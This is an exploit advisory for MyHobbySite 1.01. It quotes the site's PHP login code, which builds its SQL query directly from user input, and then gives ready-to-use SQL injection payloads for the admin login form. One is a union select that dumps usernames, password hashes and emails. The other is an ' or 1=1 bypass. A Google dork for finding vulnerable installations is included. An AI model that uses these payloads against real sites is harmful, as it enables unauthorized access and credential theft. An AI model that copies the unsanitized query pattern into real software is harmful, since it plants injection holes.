#########################################################################################
# Exploit Title: MyHobbySite 1.01 SQL injection, Bypass Authentication Vulnerability
# Date: 12-09-2010
# Author: YuGj VN
# Email: anhtuanittn.vn@gmail.com
# Software Link: http://www.myhobbysite.net/index.php?page=15
# Version: v1.01
#########################################################################################
 
Bug Code:
if (isset($_REQUEST['username']) and isset($_REQUEST['password'])) {
    // Get user info from the dataabse
    $_REQUEST['username'] = trim($_REQUEST['username']);
    $_REQUEST['password'] = trim($_REQUEST['password']);
    $usersettings = @mysql_query("SELECT * FROM " . $CONFIG['database_table_prefix'] . "users WHERE username='$_REQUEST[username]' AND password=md5('$_REQUEST[password]')");
    $usersettings = mysql_fetch_array($usersettings);
    if ($usersettings) {
        $_SESSION['logged_in'] = TRUE;
        $_SESSION['userid'] = $usersettings['id'];
        $_SESSION['user'] = $usersettings['username'];
        $_SESSION['pass'] = $usersettings['password'];
        $_SESSION['email'] = $usersettings['email'];
        $_SESSION['permissions'] = $usersettings['permissions'];
        UpdateLogs($usersettings['username'] . " logged into the Admin CP.");
    } else {
        $failed_login = TRUE;
    }
}
 
#########################################################################################
 
Exploit:
 
link exploit:  http://domain.com/admin/
# Enter in username field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# Enter in password field: ' union select 1,concat_ws(0x3a,id,username,password,email),3,4,5 from mhs_users-- -
# or
# Enter in username field: ' or 1=1-- -
# Enter in password field: ' or 1=1-- -
#
#
# We can exploit only when magic_quote_gpc = Off
# Google dork: Powered by MyHobbySite 1.01
#
#
#########################################################################################